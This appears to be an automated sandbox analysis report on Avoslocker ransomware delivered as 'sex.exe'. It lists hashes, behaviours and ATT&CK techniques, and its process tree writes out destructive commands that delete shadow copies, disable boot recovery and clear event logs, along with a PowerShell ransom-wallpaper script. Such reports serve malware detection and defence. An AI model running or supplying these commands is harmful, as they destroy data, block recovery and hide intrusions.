Analysis
-
max time kernel
94s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-12-2024 00:23
Static task
static1
Behavioral task
behavioral1
Sample
sex.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
sex.exe
Resource
win10v2004-20241007-en
General
-
Target
sex.exe
-
Size
1.6MB
-
MD5
6bd9e9d6f55a5491d8b24768023ab9d7
-
SHA1
2a5c3b978530bb2cdc981ccf52dd58a41010bc4e
-
SHA256
7859dd2f4c9797122bfe2097c5d17279c4050471c67110f95906ac152fec76a2
-
SHA512
1cd39b1d85bd9ae6d1399cd8d0e4d878b0602cd068750bb349b9c6d143d571baaab81e559e1f8cfb769ad5e1b1e0aad605b1f912ca768c554229215e218f8e18
-
SSDEEP
24576:1Imw98okVgela0as5CqLVO7XJCjkD3N0HRAxV0aEhbHdn0TrldepPZ:LL5ljasaUKeaEhDF
Malware Config
Signatures
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Avoslocker family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 37340 bcdedit.exe 37332 bcdedit.exe -
Renames multiple (8510) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Executes dropped EXE 3 IoCs
pid Process 4892 hack.exe 17708 Firefox Installer.exe 18000 setup-stub.exe -
Loads dropped DLL 7 IoCs
pid Process 18000 setup-stub.exe 18000 setup-stub.exe 18000 setup-stub.exe 18000 setup-stub.exe 18000 setup-stub.exe 18000 setup-stub.exe 18000 setup-stub.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI hack.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: hack.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1742801547.png" reg.exe -
resource yara_rule behavioral2/memory/17708-22735-0x0000000000400000-0x0000000000446000-memory.dmp upx behavioral2/files/0x000b000000023bdf-22734.dat upx behavioral2/memory/17708-22824-0x0000000000400000-0x0000000000446000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\ja-JP\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-16.png hack.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\THMBNAIL.PNG hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Grace-ppd.xrm-ms hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ppd.xrm-ms hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_KMS_Client-ppd.xrm-ms hack.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\logging.properties hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\sat_logo_2x.png hack.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\GET_YOUR_FILES_BACK.txt hack.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\GET_YOUR_FILES_BACK.txt hack.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-GoogleCloudCache.scale-200.png hack.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.INF hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ul-oob.xrm-ms hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de_2x.gif hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons.png hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\ui-strings.js hack.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-100.png hack.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt hack.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaprsr.dll.mui hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\s_agreement_filetype.svg hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\plugin-selectors.css hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_WHATSNEW.XML hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG.HXS hack.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\organize.svg hack.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-GoogleCloudCache.scale-125.png hack.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Grace-ul-oob.xrm-ms hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription3-pl.xrm-ms hack.exe File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmpnssci.dll.mui hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\ui-strings.js hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_cancel_18.svg hack.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\8041_48x48x32.png hack.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.ELM hack.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\ecc.md hack.exe File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\wmpnssui.dll.mui hack.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241007090315.pma hack.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Outlook.scale-100.png hack.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\PowerPointCapabilities.json hack.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\dcfmui.msi.16.en-us.boot.tree.dat hack.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\oledb32r.dll.mui hack.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\FrequentOfficeUpdateSchedule.xml hack.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\fa.pak hack.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\GET_YOUR_FILES_BACK.txt hack.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\OFFSYMSL.TTF hack.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\GET_YOUR_FILES_BACK.txt hack.exe File created C:\Program Files\Internet Explorer\de-DE\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt hack.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxMediumTile.scale-200.png hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png hack.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\GET_YOUR_FILES_BACK.txt hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\ui-strings.js hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ui-strings.js hack.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyView.scale-400.png hack.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_selected_18.svg hack.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\db2v0801.xsl hack.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProDemoR_BypassTrial180-ul-oob.xrm-ms hack.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\rt.jar hack.exe -
pid Process 17684 powershell.exe 53304 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 19252 18000 WerFault.exe 100 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Firefox Installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup-stub.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 37348 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4892 hack.exe 4892 hack.exe 53304 powershell.exe 53304 powershell.exe 53304 powershell.exe 53304 powershell.exe 17684 powershell.exe 17684 powershell.exe 17684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 4892 hack.exe Token: SeIncreaseQuotaPrivilege 53312 WMIC.exe Token: SeSecurityPrivilege 53312 WMIC.exe Token: SeTakeOwnershipPrivilege 53312 WMIC.exe Token: SeLoadDriverPrivilege 53312 WMIC.exe Token: SeSystemProfilePrivilege 53312 WMIC.exe Token: SeSystemtimePrivilege 53312 WMIC.exe Token: SeProfSingleProcessPrivilege 53312 WMIC.exe Token: SeIncBasePriorityPrivilege 53312 WMIC.exe Token: SeCreatePagefilePrivilege 53312 WMIC.exe Token: SeBackupPrivilege 53312 WMIC.exe Token: SeRestorePrivilege 53312 WMIC.exe Token: SeShutdownPrivilege 53312 WMIC.exe Token: SeDebugPrivilege 53312 WMIC.exe Token: SeSystemEnvironmentPrivilege 53312 WMIC.exe Token: SeRemoteShutdownPrivilege 53312 WMIC.exe Token: SeUndockPrivilege 53312 WMIC.exe Token: SeManageVolumePrivilege 53312 WMIC.exe Token: 33 53312 WMIC.exe Token: 34 53312 WMIC.exe Token: 35 53312 WMIC.exe Token: 36 53312 WMIC.exe Token: SeDebugPrivilege 53304 powershell.exe Token: SeIncreaseQuotaPrivilege 53312 WMIC.exe Token: SeSecurityPrivilege 53312 WMIC.exe Token: SeTakeOwnershipPrivilege 53312 WMIC.exe Token: SeLoadDriverPrivilege 53312 WMIC.exe Token: SeSystemProfilePrivilege 53312 WMIC.exe Token: SeSystemtimePrivilege 53312 WMIC.exe Token: SeProfSingleProcessPrivilege 53312 WMIC.exe Token: SeIncBasePriorityPrivilege 53312 WMIC.exe Token: SeCreatePagefilePrivilege 53312 WMIC.exe Token: SeBackupPrivilege 53312 WMIC.exe Token: SeRestorePrivilege 53312 WMIC.exe Token: SeShutdownPrivilege 53312 WMIC.exe Token: SeDebugPrivilege 53312 WMIC.exe Token: SeSystemEnvironmentPrivilege 53312 WMIC.exe Token: SeRemoteShutdownPrivilege 53312 WMIC.exe Token: SeUndockPrivilege 53312 WMIC.exe Token: SeManageVolumePrivilege 53312 WMIC.exe Token: 33 53312 WMIC.exe Token: 34 53312 WMIC.exe Token: 35 53312 WMIC.exe Token: 36 53312 WMIC.exe Token: SeBackupPrivilege 53512 vssvc.exe Token: SeRestorePrivilege 53512 vssvc.exe Token: SeAuditPrivilege 53512 vssvc.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeSecurityPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeSecurityPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe Token: SeSecurityPrivilege 53304 powershell.exe Token: SeBackupPrivilege 53304 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 18000 setup-stub.exe 18000 setup-stub.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 3236 wrote to memory of 4892 3236 sex.exe 82 PID 3236 wrote to memory of 4892 3236 sex.exe 82 PID 3236 wrote to memory of 4892 3236 sex.exe 82 PID 4892 wrote to memory of 3508 4892 hack.exe 84 PID 4892 wrote to memory of 3508 4892 hack.exe 84 PID 4892 wrote to memory of 3696 4892 hack.exe 85 PID 4892 wrote to memory of 3696 4892 hack.exe 85 PID 4892 wrote to memory of 3440 4892 hack.exe 86 PID 4892 wrote to memory of 3440 4892 hack.exe 86 PID 4892 wrote to memory of 1408 4892 hack.exe 87 PID 4892 wrote to memory of 1408 4892 hack.exe 87 PID 4892 wrote to memory of 4260 4892 hack.exe 88 PID 4892 wrote to memory of 4260 4892 hack.exe 88 PID 3440 wrote to memory of 37332 3440 cmd.exe 89 PID 3440 wrote to memory of 37332 3440 cmd.exe 89 PID 3696 wrote to memory of 37348 3696 cmd.exe 91 PID 3696 wrote to memory of 37348 3696 cmd.exe 91 PID 1408 wrote to memory of 37340 1408 cmd.exe 90 PID 1408 wrote to memory of 37340 1408 cmd.exe 90 PID 4260 wrote to memory of 53304 4260 cmd.exe 93 PID 4260 wrote to memory of 53304 4260 cmd.exe 93 PID 3508 wrote to memory of 53312 3508 cmd.exe 94 PID 3508 wrote to memory of 53312 3508 cmd.exe 94 PID 4892 wrote to memory of 17684 4892 hack.exe 98 PID 4892 wrote to memory of 17684 4892 hack.exe 98 PID 3236 wrote to memory of 17708 3236 sex.exe 99 PID 3236 wrote to memory of 17708 3236 sex.exe 99 PID 3236 wrote to memory of 17708 3236 sex.exe 99 PID 17708 wrote to memory of 18000 17708 Firefox Installer.exe 100 PID 17708 wrote to memory of 18000 17708 Firefox Installer.exe 100 PID 17708 wrote to memory of 18000 17708 Firefox Installer.exe 100 PID 17684 wrote to memory of 18428 17684 powershell.exe 101 PID 17684 wrote to memory of 18428 17684 powershell.exe 101 PID 17684 wrote to memory of 18600 17684 powershell.exe 102 PID 17684 wrote to memory of 18600 17684 powershell.exe 102 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\sex.exe"C:\Users\Admin\AppData\Local\Temp\sex.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\hack.exe"C:\Users\Admin\AppData\Local\Temp\hack.exe"2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\SYSTEM32\cmd.execmd /c wmic shadowcopy delete /nointeractive3⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:53312
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet3⤵
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:37348
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c bcdedit /set {default} recoveryenabled No3⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:37332
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:37340
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:53304
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:17684 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1742801547.png /f4⤵
- Sets desktop wallpaper using registry
PID:18428
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False4⤵PID:18600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Firefox Installer.exe"C:\Users\Admin\AppData\Local\Temp\Firefox Installer.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:17708 -
C:\Users\Admin\AppData\Local\Temp\7zSC25D5609\setup-stub.exe.\setup-stub.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:18000 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18000 -s 24924⤵
- Program crash
PID:19252
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:53512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 18000 -ip 180001⤵PID:19208
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1011B
MD5c92c2b70fb37f84aab38412ad9226aa8
SHA114f2e9a83285612d0a7b2c83b8f89bccfde6c154
SHA256d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f
SHA51204f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5eb6332ae9e8fec69c2236355e2638f9d
SHA171500d57fb304979afd6756f06d4b9a59f995eb7
SHA25688e5ffe18fd4a772efce68f1b0db839846cafc42d36415508ad5356a44d38f32
SHA512e87c864ba79bd7a10a62b55ad564cf3acb090e7d85707a6967497deeef5fcde1f0b4608ea8791bf81363ec583a0101d470d8f3cd2172ced8d4071d7f6c674aed
-
Filesize
630KB
MD5ea482758c49d3c0064c6a40e797ab046
SHA1e93f077ca6fd640e28eb9bd692f44d57ed96fa1a
SHA2568c6eb21ff36dcb4b2adcf556039a9ef518a3e25a1fa02bd2b8d5d8ecd344d06c
SHA512f950457146fa6de0eddfb8219b782f019d97b45a6b2d6fb66e6f3fed28b62a15c86cd22c96a3e402b06c6bb7f14c923925e2abb7e49422dcc7e2b681b7c1c3da
-
Filesize
364KB
MD5530894a1f0eb42c7837db4d74829f5c6
SHA199909db6f574ca964a9b822b9b19fd2e851b8c1e
SHA256aac3ce797f50e0a5b9f1b43aaaffb439d4c42e3cf5b9fbeac52fa3d263fde3d0
SHA5120836dd919c5f5648ce3445f9a3c84afe5e1e694ff998f1204498b2a86b13ed297469bea88af0ad7e49c97cd57153c7c43fd0a311b4c2685f4dfca5574d1d10f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
807KB
MD5e27b5291c8fb2dfdeb7f16bb6851df5e
SHA140207f83b601cd60905c1f807ac0889c80dfe33f
SHA256ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f
SHA5122ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a
-
Filesize
53KB
MD52021acc65fa998daa98131e20c4605be
SHA12e8407cfe3b1a9d839ea391cfc423e8df8d8a390
SHA256c299a0a71bf57eb241868158b4fcfe839d15d5ba607e1bdc5499fdf67b334a14
SHA512cb96d3547bab778cbe94076be6765ed2ae07e183e4888d6c380f240b8c6708662a3b2b6b2294e38c48bc91bf2cc5fc7cfcd3afe63775151ba2fe34b06ce38948
-
Filesize
95KB
MD5af9e2d138cf17b8ff4d4b8df7fddaefa
SHA1539afa302bc5cae7022896048cb7a0f3f2ab6907
SHA2563921dec014fadd1de7f3a36606ac95882a17cb96df38a5424e58531a169f825b
SHA512631ad8bbb9eea42b230f2729714874c921677c4be91ac0b35ab9e7751613045eb249f8a0dd1d5ce06bf2cd544507795836dcbf42be79f01a71333570ea27c840
-
Filesize
22KB
MD5b361682fa5e6a1906e754cfa08aa8d90
SHA1c6701aee0c866565de1b7c1f81fd88da56b395d3
SHA256b711c4f17690421c9dc8ddb9ed5a9ddc539b3a28f11e19c851e25dcfc7701c04
SHA5122778f91c9bcf83277d26c71118a1ccb0fb3ce50e89729f14f4915bc65dd48503a77b1e5118ce774dea72f5ce3cc8681eb9ca3c55cf90e9f61a177101ba192ae9
-
Filesize
28KB
MD5d23b256e9c12fe37d984bae5017c5f8c
SHA1fd698b58a563816b2260bbc50d7f864b33523121
SHA256ec6a56d981892bf251df1439bea425a5f6c7e1c7312d44bedd5e2957f270338c
SHA51213f284821324ffaeadafd3651f64d896186f47cf9a68735642cf37b37de777dba197067fbccd3a7411b5dc7976e510439253bd24c9be1d36c0a59d924c17ae8e
-
Filesize
14KB
MD5610ad03dec634768cd91c7ed79672d67
SHA1dc8099d476e2b324c09db95059ec5fd3febe1e1e
SHA256c6c413108539f141bea3f679e0e2ef705898c51ec7c2607f478a865fc5e2e2df
SHA51218c3c92be81aadfa73884fe3bdf1fce96ccfbd35057600ef52788a871de293b64f677351ba2885c6e9ce5c3890c22471c92832ffc13ba544e9d0b347c5d33bfd
-
Filesize
103KB
MD5b53cd4ad8562a11f3f7c7890a09df27a
SHA1db66b94670d47c7ee436c2a5481110ed4f013a48
SHA256281a0dc8b4f644334c2283897963b20df88fa9fd32acca98ed2856b23318e6ec
SHA512bb45d93ed13df24a2056040c219cdf36ee44c8cddb7e178fdaabcec63ac965e07f679ca1fa42591bba571992af619aa1dc76e819a7901709df79598a2b0cef81
-
Filesize
1KB
MD51cb97b5f8c5f2728b26742d1d0669899
SHA1bb5ab1b8c00810fcb18184a996573c5accdc72c3
SHA256dec82e9caa154300e1aa44f550c16b455a2025be4fb1c3155cb75fe04a6b6611
SHA512768ed2b070485f3bbcf457aefdc0ef8f1737ad8ac4a2703e2feaff424f9a2c69a2f5928a3be898932ef4976a44ea829a099d090bd9941a24d045d5c8ac8b7b43
-
Filesize
1KB
MD5d845e8f4c0edb3cab17e6a30090ac5b8
SHA1654f058570f0868f0acc5f0595147f3385a9c265
SHA2561adcfdd9768242c6c639b10e4f0bcda24f6a957a169c1dede265e40336ecbd4f
SHA512401d800c484b74401b90c3285d8b6cc0018baf4979d6ec7bb174f7810d3f60adfa6b4cebeafcee20d5a7c3597447f755af19c5fecf1863e2438fe427dbdf9fed
-
Filesize
815B
MD5efce3dce0165b3f6551db47e5c0ac8d6
SHA11e15f6bb688e3d645092c1aa5ee3136f8de65312
SHA256dab39cbae31848cce0b5c43fddd2674fef4dea5b7a3dacdaabdc78a8a931817e
SHA512cec12da07f52822aaed340b1b751153efa43e5c3d747fa39f03bb2800bf53e9416020d654a818a6088acb2cf5581714433d818537f04af150e6bfb6861c03988